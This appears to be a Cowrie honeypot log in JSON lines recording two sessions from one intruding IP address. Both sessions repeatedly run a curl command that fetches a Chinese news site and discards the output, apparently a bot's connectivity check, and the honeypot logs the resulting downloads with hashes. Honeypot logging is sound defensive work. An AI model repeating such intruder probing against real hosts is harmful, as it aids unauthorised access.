{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.786354Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.791502Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.792267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.795990Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.809014Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.817544Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.818567Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.829238Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.829874Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.855181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.856158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.867450Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.868561Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.890972Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.893590Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.894618Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.900876Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.906691Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.907683Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.932552Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.933553Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.937166Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.945634Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.947451Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.948768Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.972830Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.978180Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.979259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.983116Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:41.991518Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.992582Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:41.996447Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.004666Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.016080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.017074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.032352Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.033550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.052045Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.058979Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.060729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.074718Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.080631Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.085741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.086920Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.099662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.100707Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.110157Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.127634Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.128625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.136286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.137345Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.152482Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.154914Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.166084Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.167198Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.172487Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.173409Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.193758Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.201009Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.205593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.206261Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.224248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.226038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.231362Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.261085Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.262599Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.265985Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.269794Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.270781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.274954Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.290219Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.293501Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.300630Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.301593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.308816Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.309704Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.312081Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.316833Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.336894Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.340329Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:42.343477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:42.344769Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
